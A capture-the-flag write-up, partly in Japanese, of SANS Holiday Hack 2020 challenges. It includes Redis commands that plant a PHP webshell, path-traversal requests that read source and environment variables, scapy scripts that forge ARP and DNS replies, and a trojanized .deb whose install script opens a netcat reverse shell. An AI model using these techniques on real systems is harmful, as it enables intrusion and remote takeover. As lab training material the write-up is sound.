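After solving the questions up to here, Alice gives you the Base64-encoded encrypted string 7FXjP1lyfKbyDK/MChyf36h7. Decoding this should reveal the attack group.

Incidentally, she even tells you that the cipher is RFC7465. That is RC4, so what remains is to find the password. The password is said to be Santa's favorite phrase, so after talking to various people, Bubble Lightington gives the keyword Stay frosty. Then decrypting with CyberChef gives the answer.

Answer: The Lollipop Guild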

7) Solve the Sleigh's CAN-D-BUS Problem

Difficulty: 🎄🎄🎄
Jack Frost is somehow inserting malicious messages onto the sleigh's CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.

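Since it is CAN-D-BUS, I guessed it was a challenge about vehicle networks. For now I moved to the NetWars room, where there is a terminal challenge called CAN-Bus Investigation, and solved that.

CAN-Bus Investigation

Launching the terminal prints the message below. Checking the log shows plausible-looking entries recorded.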

Welcome to the CAN bus terminal challenge!
In your home folder, there's a CAN bus capture from Santa's sleigh. Some of
the data has been cleaned up, so don't worry - it isn't too noisy. What you
will see is a record of the engine idling up and down. Also in the data are
a LOCK signal, an UNLOCK signal, and one more LOCK. Can you find the UNLOCK?
We'd like to encode another key mechanism.
Find the decimal portion of the timestamp of the UNLOCK code in candump.log
and submit it to ./runtoanswer!  (e.g., if the timestamp is 123456.112233,
please submit 112233)
$ head candump.log  
(1608926660.800530) vcan0 244#0000000116
(1608926660.812774) vcan0 244#00000001D3
(1608926660.826327) vcan0 244#00000001A6
(1608926660.839338) vcan0 244#00000001A3
(1608926660.852786) vcan0 244#00000001B4
(1608926660.866754) vcan0 244#000000018E
(1608926660.879825) vcan0 244#000000015F
(1608926660.892934) vcan0 244#0000000103
(1608926660.904816) vcan0 244#0000000181
(1608926660.920799) vcan0 244#000000015F

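It looks like you find the UNLOCK command and submit its timestamp using the runtoanswer file.

I do not know much about CAN bus, so I studied on YouTube.

www.youtube.com

Apparently the characters before the # in the log are the CAN ID, and the data after the # is what is being sent to it. We are looking for the unlock, so we need to find the CAN ID that performs the unlock. IDs with lots of log entries are probably not it, so I excluded them and looked.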

$ cat candump.log | grep -v 244#
(1608926660.970738) vcan0 188#00000000
(1608926661.474018) vcan0 188#00000000
(1608926661.978259) vcan0 188#00000000
(1608926662.478577) vcan0 188#00000000
(1608926662.977733) vcan0 188#00000000
(1608926663.483216) vcan0 188#00000000
(1608926663.989726) vcan0 188#00000000
(1608926664.491259) vcan0 188#00000000
(1608926664.626448) vcan0 19B#000000000000
(1608926664.996093) vcan0 188#00000000
(1608926665.499007) vcan0 188#00000000
(1608926666.009926) vcan0 188#00000000
(1608926666.512371) vcan0 188#00000000
(1608926667.013385) vcan0 188#00000000
(1608926667.520201) vcan0 188#00000000
(1608926668.022800) vcan0 188#00000000
(1608926668.530024) vcan0 188#00000000
(1608926669.036851) vcan0 188#00000000
(1608926669.544057) vcan0 188#00000000
(1608926670.046480) vcan0 188#00000000
(1608926670.550541) vcan0 188#00000000
(1608926671.055065) vcan0 188#00000000
(1608926671.122520) vcan0 19B#00000F000000
(1608926671.558329) vcan0 188#00000000
(1608926672.063221) vcan0 188#00000000
(1608926672.568871) vcan0 188#00000000
(1608926673.072611) vcan0 188#00000000
(1608926673.579853) vcan0 188#00000000
(1608926674.086447) vcan0 188#00000000
(1608926674.092148) vcan0 19B#000000000000
(1608926674.589954) vcan0 188#00000000
(1608926675.099853) vcan0 188#00000000
(1608926675.605010) vcan0 188#00000000
(1608926676.110132) vcan0 188#00000000
(1608926676.617537) vcan0 188#00000000
(1608926677.121567) vcan0 188#00000000
(1608926677.630561) vcan0 188#00000000
(1608926678.141434) vcan0 188#00000000

188 is presumably something else too, but there is only one 19B#00000F000000, so that appears to be the unlock.

$ ./runtoanswer 122520
Your answer: 122520
Checking....
Your answer is correct!
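
The same triage done by grep above, as an added Python example (not part of the original writeup) that generalizes it slightly: parse the candump lines, profile each CAN ID, skip IDs whose payload keeps changing, and report payloads seen only once on the remaining IDs. The sample is a constructed excerpt of frames shown in this section; max_states is a hypothetical tuning value.

```python
import re
from collections import Counter, defaultdict

# Constructed excerpt: frames taken from the candump.log output shown above.
SAMPLE_LOG = """\
(1608926660.800530) vcan0 244#0000000116
(1608926660.812774) vcan0 244#00000001D3
(1608926660.826327) vcan0 244#00000001A6
(1608926660.839338) vcan0 244#00000001A3
(1608926660.852786) vcan0 244#00000001B4
(1608926660.866754) vcan0 244#000000018E
(1608926660.970738) vcan0 188#00000000
(1608926661.474018) vcan0 188#00000000
(1608926664.626448) vcan0 19B#000000000000
(1608926664.996093) vcan0 188#00000000
(1608926671.122520) vcan0 19B#00000F000000
(1608926671.558329) vcan0 188#00000000
(1608926674.092148) vcan0 19B#000000000000
(1608926674.589954) vcan0 188#00000000
"""

FRAME_RE = re.compile(
    r"\((?P<sec>\d+)\.(?P<frac>\d+)\)\s+(?P<iface>\S+)\s+"
    r"(?P<id>[0-9A-Fa-f]+)#(?P<data>[0-9A-Fa-f]*)"
)


def parse_candump(text):
    """Return one dict per well-formed candump line; other lines are skipped."""
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.fullmatch(line.strip())
        if m:
            frames.append({"frac": m["frac"],
                           "id": m["id"].upper(),
                           "data": m["data"].upper()})
    return frames


def profile_ids(frames):
    """Map each CAN ID to a Counter of the payloads seen on it."""
    per_id = defaultdict(Counter)
    for frame in frames:
        per_id[frame["id"]][frame["data"]] += 1
    return per_id


def one_off_commands(frames, max_states=4):
    """Payloads seen exactly once on IDs that carry only a few distinct values.

    IDs with more than max_states distinct payloads are treated as continuous
    readings (the idling engine on 244) and skipped. On the remaining
    state/command IDs, a payload that appears a single time stands out.
    """
    per_id = profile_ids(frames)
    hits = []
    for frame in frames:
        payloads = per_id[frame["id"]]
        if len(payloads) <= max_states and payloads[frame["data"]] == 1:
            hits.append((frame["frac"], frame["id"], frame["data"]))
    return hits


if __name__ == "__main__":
    frames = parse_candump(SAMPLE_LOG)
    for can_id, payloads in sorted(profile_ids(frames).items()):
        print(can_id, dict(payloads))
    print(one_off_commands(frames))
```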

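So the answer is 122520, the timestamp of 19B#00000F000000.

Sleigh CAN-D-Bus

After finishing the terminal challenge, you are told something like: "Someone seems to have tampered with Santa's sleigh, and I'd like you to find it. But only Santa can touch the sleigh, so I'll ask Santa to let you touch it too next time."

I can become Santa, so I became Santa and touched the sleigh. The screen below was displayed.

Figure: Sleigh CAN-D-Bus

Reading the hints, it seems that operating the brake causes strange codes to be included.

Setting the brake to 18 shows that, besides 080#000012 (18 in hexadecimal), data of unknown purpose, 080#FFFFFD, is being sent.

Removing this should do it.

I recall setting it to 080 Contains FFFFF, but when I tried it while writing this article no clear message or the like appeared, so I could not reconfirm it, and it was not in my notes either. My mistake......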

8) Broken Tag Generator

Difficulty: 🎄🎄🎄🎄
Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.

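The task is to find the environment variable GREETZ used by the Tag Generator. But before that, going to Holly Evergreen gets a hint, so I went to solve the terminal challenge.

Redis Bug Hunt

Clearing the Redis Bug Hunt terminal right next to Holly Evergreen should get a hint, so I solved it. It looks like the goal is to display the contents of index.php.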

We need your help!!
The server stopped working, all that's left is the maintenance port.
To access it, run:
curl http://localhost/maintenance.php
We're pretty sure the bug is in the index page. Can you somehow use the
maintenance page to view the source code for the index page?

$ curl http://localhost/maintenance.php
ERROR: 'cmd' argument required (use commas to separate commands); eg:
curl http://localhost/maintenance.php?cmd=help
curl http://localhost/maintenance.php?cmd=mget,example1

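I was at a loss in various ways, but it felt like a pentest-style challenge, so I wondered whether there were pentest attack techniques around Redis, and found one. I was going to introduce that page, but one of the links in it redirected to a tech-support-scam site, so to be safe I am not listing it.

Well, it turns up if you search with suitable keywords, so be careful. Use maintenance.php to plant a PHP webshell and execute it. Clearing probably requires the output to appear on the console, so finally I displayed the file I had written out, and that cleared it.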

$ curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html
$ curl http://localhost/maintenance.php?cmd=config,set,dbfilename,web.php
$ curl http://localhost/maintenance.php?cmd=set,test,"%3C?php%20system(%24_GET%5B%22cmd%22%5D);%20?%3E"
$ curl http://localhost/maintenance.php?cmd=save
$ curl http://localhost/web.php?cmd=cat%20index.php --output out.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   680  100   680    0     0   132k      0 --:--:-- --:--:-- --:--:--  132k
$ cat out.txt 
REDIS0009�      redis-ver5.0.3�
�edis-bits�@�ctime�^�`�used-mem
 aof-preamble���example2#We think there's a bug in index.phptest<?php
# We found the bug!!
#
#         \   /
#         .\-/.
#     /\ ()   ()
#       \/~---~\.-~^-.
# .-~^-./   |   \---.
#      {    |    }   \
#    .-~\   |   /~-.
#   /    \  A  /    \
#         \/ \/
# 
echo "Something is wrong with this page! Please use http://localhost/maintenance.php to see if you can figur
e out what's going on"
?>
example1The site is in maintenance mode�z׾� �

Broken Tag Generator

画像を送信したりして、オリジナルタグを作ることができそうなサービスの環境変数を見つける。 サービスにアクセスすると下記の画面が表示される

f:id:kataware8136:20210117123530p:plain
Tag-Generator

ここからはBurp Suiteを使って解いていく。

Select fileで自分のローカルのファイルのアップロードが可能。ここでphpinfoのファイルをアップロードしようとすると、エラー画面が表示される

app/lib/app.rbでエラーが出力されることがわかる。

f:id:kataware8136:20210117124149p:plain

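Conversely, uploading an image file returns what looks like a resource id in the response.

Looking at the JavaScript, the uploaded image is fetched in the form image?id={}.

I try LFI here.

Send the request https://tag-generator.kringlecastle.com/image?id=../../../../app/lib/app.rb. The web page only shows an error, but the response in Burp contains the source code.

However, the goal is not the source code but an environment variable. Nothing of the sort was in the source code.

After more head-scratching, I learned that a process's environment variables can apparently be read from /proc/{PID}/environ. So I try that through the LFI.

Sending https://tag-generator.kringlecastle.com/image?id=../../../proc/self/environ returns GREETZ=JackFrostWasHere. This is the answer.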
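
The traversal works because the id value is used as a path fragment without being canonicalized. The sketch below, an added example that is not the challenge's app.rb, contrasts that lookup with one that resolves the path and refuses anything outside the upload directory; the directory layout and function names are assumptions.

```python
import os
import tempfile

def resolve_naive(upload_dir, image_id):
    # Vulnerable pattern: the id is trusted as a path fragment, so "../" climbs out.
    return os.path.normpath(os.path.join(upload_dir, image_id))

def resolve_safe(upload_dir, image_id):
    """Return the canonical path for image_id, or None if it leaves upload_dir."""
    base = os.path.realpath(upload_dir)
    # realpath collapses ".." and follows symlinks before the containment test.
    candidate = os.path.realpath(os.path.join(base, image_id))
    # commonpath compares whole path components, so a sibling such as
    # "uploads_old" does not pass the way it would with a startswith() test.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def demo():
    """Map each sample id to True (served) or False (rejected)."""
    sample_ids = (
        "a1b2c3.png",                    # constructed, well-formed id
        "../../../proc/self/environ",    # id values from the requests above
        "../../../../app/lib/app.rb",
        "../uploads_old/x.png",          # constructed sibling-directory case
        "/etc/passwd",                   # absolute path: join() drops the base
    )
    results = {}
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")   # assumed upload directory
        os.makedirs(uploads)
        for image_id in sample_ids:
            results[image_id] = resolve_safe(uploads, image_id) is not None
    return results

if __name__ == "__main__":
    print(resolve_naive("/srv/uploads", "../../proc/self/environ"))
    for image_id, served in demo().items():
        print("served  " if served else "rejected", image_id)
```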

9) ARP Shenanigans

Personally, this was the challenge I enjoyed most.

Difficulty: 🎄🎄🎄🎄
Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

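Near Alabaster Snowball there are the Scapy Prepper and ARP Shenanigans terminals; as with the earlier objectives, the terminal challenge serves as a hint for the main objective.

First, solve Scapy Prepper.

Scapy Prepper

This appears to be a challenge about scapy, a Python library for crafting packets. You fetch each task with task.get() and send your answer with task.submit().

I simply kept answering the questions while consulting the reference and other material. Hints are available for this challenge, so I only list the answers here. In practice I looked up a lot of things along the way.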

>>> task.get()
Welcome to the "Present Packet Prepper" interface! The North Pole could use your help preparing present pack
ets for shipment.
Start by running the task.submit() function passing in a string argument of 'start'.
Type task.help() for help on this question.
>>>  task.submit('start')
Correct! adding a () to a function or class will execute it. Ex - FunctionExecuted()
Submit the class object of the scapy module that sends packets at layer 3 of the OSI model.
>>>  task.submit(send)
Correct! The "send" scapy class will send a crafted scapy packet out of a network interface.
Submit the class object of the scapy module that sniffs network packets and returns those packets in a list.
>>>  task.submit(scapy.sendrecv.sniff)
Correct! the "sniff" scapy class will sniff network traffic and return these packets in a list.
Submit the NUMBER only from the choices below that would successfully send a TCP packet and then return the 
first sniffed response packet to be stored in a variable named "pkt":
1. pkt = sr1(IP(dst="127.0.0.1")/TCP(dport=20))
2. pkt = sniff(IP(dst="127.0.0.1")/TCP(dport=20))
3. pkt = sendp(IP(dst="127.0.0.1")/TCP(dport=20))
>>>  task.submit(1)
Correct! sr1 will send a packet, then immediately sniff for a response packet.
Submit the class object of the scapy module that can read pcap or pcapng files and return a list of packets.
>>>  task.submit(scapy.utils.rdpcap)
Correct! the "rdpcap" scapy class can read pcap files.
The variable UDP_PACKETS contains a list of UDP packets. Submit the NUMBER only from the choices below that 
correctly prints a summary of UDP_PACKETS:
1. UDP_PACKETS.print()
2. UDP_PACKETS.show()
3. UDP_PACKETS.list()
>>>  task.submit(2)
Correct! .show() can be used on lists of packets AND on an individual packet.
Submit only the first packet found in UDP_PACKETS.
>>> task.submit(UDP_PACKETS[0])
Correct! Scapy packet lists work just like regular python lists so packets can be accessed by their position
 in the list starting at offset 0.
Submit only the entire TCP layer of the second packet in TCP_PACKETS.
>>> task.submit(TCP_PACKETS[1].getlayer(TCP))
Correct! Most of the major fields like Ether, IP, TCP, UDP, ICMP, DNS, DNSQR, DNSRR, Raw, etc... can be acce
ssed this way. Ex - pkt[IP][TCP]
Change the source IP address of the first packet found in UDP_PACKETS to 127.0.0.1 and then submit this modi
fied packet
>>> pkt = UDP_PACKETS[0]
>>> pkt[IP].src = "127.0.0.1"
>>> task.submit(pkt)
Correct! You can change ALL scapy packet attributes using this method.
Submit the password "task.submit('elf_password')" of the user alabaster as found in the packet list TCP_PACK
ETS.
>>> task.submit('echo')
Correct! Here is some really nice list comprehension that will grab all the raw payloads from tcp packets:
[pkt[Raw].load for pkt in TCP_PACKETS if Raw in pkt]
The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. S
ubmit only the ICMP chksum value from the second packet in the ICMP_PACKETS list.
>>> task.submit(ICMP_PACKETS[1][ICMP].chksum)
Correct! You can access the ICMP chksum value from the second packet using ICMP_PACKETS[1][ICMP].chksum .
Submit the number of the choice below that would correctly create a ICMP echo request packet with a destinat
ion IP of 127.0.0.1 stored in the variable named "pkt"
1. pkt = Ether(src='127.0.0.1')/ICMP(type="echo-request")
2. pkt = IP(src='127.0.0.1')/ICMP(type="echo-reply")
3. pkt = IP(dst='127.0.0.1')/ICMP(type="echo-request")
>>> task.submit(3)
Correct! Once you assign the packet to a variable named "pkt" you can then use that variable to send or mani
pulate your created packet.
Create and then submit a UDP packet with a dport of 5000 and a dst IP of 127.127.127.127. (all other packet 
attributes can be unspecified)
>>> pkt = IP(dst='127.127.127.127')/UDP(dport=5000)
>>> task.submit(pkt)
Correct! Your UDP packet creation should look something like this:
pkt = IP(dst="127.127.127.127")/UDP(dport=5000)
task.submit(pkt)
Create and then submit a UDP packet with a dport of 53, a dst IP of 127.2.3.4, and is a DNS query with a qna
me of "elveslove.santa". (all other packet attributes can be unspecified)
>>> pkt1 = IP(dst='127.2.3.4')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname= "elveslove.santa"))
>>> task.submit(pkt1)
Correct! Your UDP packet creation should look something like this:
pkt = IP(dst="127.2.3.4")/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="elveslove.santa"))
task.submit(pkt)
The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet) 
has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP respons
e and then task.submit(ARP_PACKETS) for inspection.
>>> ARP_PACKETS[1][ARP].hwsrc = "00:13:46:0b:22:ba"
>>> ARP_PACKETS[1][ARP].hwdst = "00:16:ce:6e:8b:24"
>>> ARP_PACKETS[1][ARP].op = 2
>>> task.submit(ARP_PACKETS)
Great, you prepared all the present packets!
Congratulations, all pretty present packets properly prepared for processing!

ARP Shenanigans

The main challenge. A message is displayed on startup. HELP.md explains how to use the environment.

Jack Frost has hijacked the host at 10.6.6.35 with some custom malware.
Help the North Pole by getting command line access back to this host.
Read the HELP.md file for information to help you in this endeavor.
Note: The terminal lifetime expires after 30 or more minutes so be 
sure to copy off any essential work you have done as you go.
# How To Resize and Switch Terminal Panes:
You can use the key combinations ( Ctrl+B ↑ or ↓ ) to resize the terminals.
You can use the key combinations ( Ctrl+B o ) to switch terminal panes.
See tmuxcheatsheet.com for more details
# To Add An Additional Terminal Pane:
`/usr/bin/tmux split-window -hb`
# To exit a terminal pane simply type:
`exit`
# To Launch a webserver to serve-up files/folder in a local directory:

cd /my/directory/with/files
python3 -m http.server 80

# A Sample ARP pcap can be viewed at:
https://www.cloudshark.org/captures/d97c5b81b057
# A Sample DNS pcap can be viewed at:
https://www.cloudshark.org/captures/0320b9b57d35
# If Reading arp.pcap with tcpdump or tshark be sure to disable name
# resolution or it will stall when reading:

tshark -nnr arp.pcap
tcpdump -nnr arp.pcap

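To explain this challenge up front, the flow is as follows.
* Running tcpdump shows incoming ARP requests, so answer them with an ARP reply.
* Once the ARP reply is sent, a DNS request arrives, so answer it with a DNS response that points to your own host.
* Once the DNS response is sent, the host tries to fetch a .deb file over FTP.
* Prepare a crafted .deb file and get a reverse shell.

When I actually solved it, I tried each step, saw the behavior change, and then wrote something that returns the matching response. So what follows is writing the scripts that return those responses.

First, the ARP response. The MAC address and private IP change every time the terminal is started, so they need to be adjusted accordingly.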

#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 ip
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our eth0 mac address
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
def handle_arp_packets(packet):
    # if arp request, then we need to fill this out to send back our mac as the response
    if ARP in packet and packet[ARP].op == 1:
        ether_resp = Ether(dst="4c:24:57:ab:ed:84", type=0x806, src="02:42:0a:06:00:03")
        arp_response = ARP(pdst="10.6.6.35")
        arp_response.op = 2
        arp_response.plen = 4
        arp_response.hwlen = 6
        arp_response.ptype = 0x800
        arp_response.hwtype = 0x1
        arp_response.hwsrc = "02:42:0a:06:00:03"
        arp_response.psrc = "10.6.6.53"
        arp_response.hwdst = "4c:24:57:ab:ed:84"
        arp_response.pdst = "10.6.6.35"
        response = ether_resp/arp_response
        sendp(response, iface="eth0")
def main():
    # We only want arp requests
    berkeley_packet_filter = "(arp[6:2] = 1)"
    # sniffing for one packet that will be sent to a function, while storing none
    sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1)
if __name__ == "__main__":
    main()
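
From the defender's side, the forged reply above answers a real request, so a rule that only looks for unsolicited replies would miss it; what gives it away is that 10.6.6.53 suddenly maps to a different MAC. The added example below (not from the challenge or from this writeup's scripts) parses raw ARP frames and checks them against a binding table; the genuine MAC for 10.6.6.53 and the frames are constructed, using the addresses shown in the script.

```python
import socket
import struct

ARP_ETHERTYPE = 0x0806

def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))

def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)

def build_arp(eth_src, eth_dst, op, sha, spa, tha, tpa):
    """Build an Ethernet/ARP frame; used here only to construct sample input."""
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!H", ARP_ETHERTYPE)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sha) + socket.inet_aton(spa) + mac_bytes(tha) + socket.inet_aton(tpa)
    return eth + arp

def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        return None
    _dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ARP_ETHERTYPE:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {"eth_src": mac_text(eth_src), "op": op,
            "sha": mac_text(sha), "spa": socket.inet_ntoa(spa),
            "tha": mac_text(tha), "tpa": socket.inet_ntoa(tpa)}

class ArpMonitor:
    def __init__(self, trusted=None):
        self.bindings = dict(trusted or {})   # ip -> mac, trusted entries first
        self.pending = set()                  # (asker_ip, wanted_ip) awaiting a reply

    def inspect(self, frame):
        """Return a list of alert strings for one captured frame."""
        pkt = parse_arp(frame)
        alerts = []
        if pkt is None:
            return alerts
        if pkt["eth_src"] != pkt["sha"]:
            alerts.append(f"sender mismatch: frame from {pkt['eth_src']} claims {pkt['sha']}")
        if pkt["op"] == 1:
            self.pending.add((pkt["spa"], pkt["tpa"]))
        elif pkt["op"] == 2:
            key = (pkt["tpa"], pkt["spa"])
            if key in self.pending:
                self.pending.discard(key)
            else:
                alerts.append(f"unsolicited reply for {pkt['spa']}")
        if pkt["spa"] != "0.0.0.0":           # ARP probes carry no sender IP
            known = self.bindings.setdefault(pkt["spa"], pkt["sha"])
            if known != pkt["sha"]:
                alerts.append(f"binding conflict: {pkt['spa']} is {known}, frame says {pkt['sha']}")
        return alerts

VICTIM_MAC, VICTIM_IP = "4c:24:57:ab:ed:84", "10.6.6.35"    # from the script above
SPOOF_MAC, SPOOFED_IP = "02:42:0a:06:00:03", "10.6.6.53"    # from the script above
REAL_MAC = "02:00:5e:10:00:53"   # constructed: assumed genuine owner of 10.6.6.53

def sample_run():
    monitor = ArpMonitor(trusted={SPOOFED_IP: REAL_MAC})
    request = build_arp(VICTIM_MAC, "ff:ff:ff:ff:ff:ff", 1,
                        VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", SPOOFED_IP)
    forged = build_arp(SPOOF_MAC, VICTIM_MAC, 2,
                       SPOOF_MAC, SPOOFED_IP, VICTIM_MAC, VICTIM_IP)
    # request, the forged answer, then the same forged reply repeated unasked
    return [monitor.inspect(request), monitor.inspect(forged), monitor.inspect(forged)]

if __name__ == "__main__":
    for alerts in sample_run():
        print(alerts)
```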

DNS response

#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = "10.6.6.53"
def handle_dns_request(packet):
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    org_ip = packet[IP]
    org_udp = packet[UDP]
    org_dns = packet[DNS]
    eth = Ether(src="02:42:0a:06:00:03", dst="4c:24:57:ab:ed:84")   # need to replace mac addresses
    ip  = IP(dst=org_ip.src, src=org_ip.dst)                          # need to replace IP addresses
    udp = UDP(dport=org_udp.dport, sport=53)                             # need to replace ports
    dns = DNS(
        # MISSING DNS RESPONSE LAYER VALUES 
        id=org_dns.id,ancount=1,qr=1,qd=org_dns.qd,an=DNSRR(rrname=org_dns.qd.qname, type='A',rdata="10.6.0.3")
    )
    dns_response = eth / ip / udp / dns
    sendp(dns_response, iface="eth0")
def main():
    berkeley_packet_filter = " and ".join( [
        "udp dst port 53",                              # dns
        "udp[10] & 0x80 = 0",                           # dns request
        "dst host {}".format(ipaddr_we_arp_spoofed),    # destination ip we had spoofed (not our real ip)
        "ether dst host {}".format(macaddr)             # our macaddress since we spoofed the ip to our mac
    ] )
    # sniff the eth0 int without storing packets in memory and stopping after one dns request
    sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1)
if __name__ == "__main__":
    main()

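Tamper with a .deb file to get a reverse shell. I built this by following the site given in the hint. The hinted site creates the payload with msfvenom, but here a reverse shell is all that is needed, so the .deb file I tamper with is the nc package, and I change it so that nc sets up the reverse shell.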

#!/bin/sh
set -e
if [ "$1" = "configure" ]; then
    update-alternatives \
        --install /bin/nc nc /bin/nc.traditional 10 \
        --slave /bin/netcat netcat /bin/nc.traditional \
        --slave /usr/share/man/man1/nc.1.gz nc.1.gz \
                /usr/share/man/man1/nc.traditional.1.gz \
        --slave /usr/share/man/man1/netcat.1.gz netcat.1.gz \
                /usr/share/man/man1/nc.traditional.1.gz
fi
nc 10.6.0.3 4444 -e /bin/bash

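With this prepared, build the .deb file and lay out the folders so that they match the request. Then just listen with nc -lpv 4444.

If everything runs properly, the reverse shell connects. The task is to find, in the file /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt, the person who declined to vote. I view it with the cat command.

The text contains "Tanta Kringle recused", so the answer is Tanta Kringle.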

NORTH POLE                                                                                                                     │
LAND USE BOARD                                                                                                                 │
MEETING MINUTES                                                                                                                │
                                                                                                                               │
January 20, 2020                                                                                                               │
                                                                                                                               │
Meeting Location: All gathered in North Pole Municipal Building, 1 Santa Claus Ln, North Pole                                  │
                                                                                                                               │
Chairman Frost calls meeting to order at 7:30 PM North Pole Standard Time.                                                    
Chairman Frost made the required announcement concerning the Open Public Meetings Act: Adequate notice of this meeting has been│
 made -- displayed on the bulletin board next to the Pole, listed on the North Pole community website, and published in the Nor│
th Pole Times newspaper -- for people who are interested in this meeting.                                                      │
                                                                                                                               │
Review minutes for December 2020 meeting. Motion to accept – Mrs. Donner. Second – Superman.  Minutes approved.                │
                                                                                                                               │
OLD BUSINESS: No Old Business.                                                                                                 │
                                                                                                                               │
RESOLUTIONS:                                                                                                                   │
The board took up final discussions of the plans presented last year for the expansion of Santa’s Castle to include new courtya│
rd, additional floors, elevator, roughly tripling the size of the current castle.  Architect Ms. Pepper reviewed the planned ch│
anges and engineering reports. Chairman Frost noted, “These changes will put a heavy toll on the infrastructure of the North Po│
le.”  Mr. Krampus replied, “The infrastructure has already been expanded to handle it quite easily.”  Chairman Frost then noted│
, “But the additional traffic will be a burden on local residents.”  Dolly explained traffic projections were all in alignment │
with existing roadways.  Chairman Frost then exclaimed, “But with all the attention focused on Santa and his castle, how will p│
eople ever come to refer to the North Pole as ‘The Frostiest Place on Earth?’”  Mr. In-the-Box pointed out that new tourist-fri│
endly taglines are always under consideration by the North Pole Chamber of Commerce, and are not a matter for this Board.  Mrs.│
 Nature made a motion to approve.  Seconded by Mr. Cornelius.  Tanta Kringle recused herself from the vote given her adoption o│
f Kris Kringle as a son early in his life.                                                                                     │
                                                                                                                               │
Approved:                                                                                                                      │
Mother Nature                                                                                                                  │
Superman                                                                                                                       │
Clarice                                                                                                                        │
Yukon Cornelius                                                                                                                │
Ginger Breaddie                                                                                                                │
King Moonracer                                                                                                                 │
Mrs. Donner                                                                                                                    │
Charlie In the Box                                                                                                             │
Krampus                                                                                                                        │
Dolly                                                                                                                          │
Snow Miser                                                                                                                     │
Alabaster Snowball                                                                                                             │
Queen of the Winter Spirits                                                                                                    │
                                                                                                                               │
Opposed:                                                                                                                       │
                Jack Frost                                                                                                     │
                                                                                                                               │
Resolution carries.  Construction approved.                                                                                    │
                                                                                                                               │
NEW BUSINESS:                                                                                                                  │
                                                                                                                               │
Father Time Castle, new oversized furnace to be installed by Heat Miser Furnace, Inc.  Mr. H. Miser described the plan for inst│
alling new furnace to replace the faltering one in Mr. Time’s 20,000 sq ft castle. Ms. G. Breaddie pointed out that the propose│
d new furnace is 900,000,000 BTUs, a figure she considers “incredibly high for a building that size, likely two orders of magni│
tude too high.  Why, it might burn the whole North Pole down!”  Mr. H. Miser replied with a laugh, “That’s the whole point!”  T│
he board voted unanimously to reject the initial proposal, recommending that Mr. Miser devise a more realistic and safe plan fo│
r Mr. Time’s castle heating system.                                                                                            │
                                                                                                                               │
                                                                                                                               │
Motion to adjourn – So moved, Krampus.  Second – Clarice. All in favor – aye. None opposed, although Chairman Frost made anothe│
r note of his strong disagreement with the approval of the Kringle Castle expansion plan.  Meeting adjourned.

10) Defeat Fingerprint Sensor

Difficulty: 🎄🎄🎄
Bypass the Santavator fingerprint sensor. Enter Santa's office without Santa's fingerprint.

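The task is to get past the fingerprint authentication that guards Santa's office in the Santavator. Since you can become Santa in this game, comparing the requests made as Santa and as non-Santa should reveal the answer.

The requests differ slightly between being Santa and not being Santa: the Santa one carries a parameter called besanta.

After that, just add besanta to the part loaded in the iframe and click.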

11a) Naughty/Nice List with Blockchain Investigation Part 1

Difficulty: 🎄🎄🎄🎄🎄
Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex value of the nonce)

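Entering Santa's office as Santa in objective 10 gives you the Naughty/Nice list data file (the file name is blockchain.dat).

This objective is about that blockchain data. Before that, though, Tangle Coalbox is said to have hints, so I go and solve the terminal challenge.

Snowball Fight

A game in which you and the opponent each have targets on a field, and whoever hits them first wins. Easy can be won by playing casually, but on Impossible the opponent never misses, so you, moving first, must not miss either.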

[Figure: Snowball Fight]

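Looking at the page source in Impossible mode reveals a large number of integers. The hints indicate that Python's random module is used, so they are generated by the Mersenne Twister. The many numbers shown are presumably there for reconstructing the internal state.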

<!--
    Seeds attempted:
    
    646982050 - Not random enough
    860190093 - Not random enough
    2195852736 - Not random enough
    2563904612 - Not random enough
    729049201 - Not random enough
    2470307167 - Not random enough
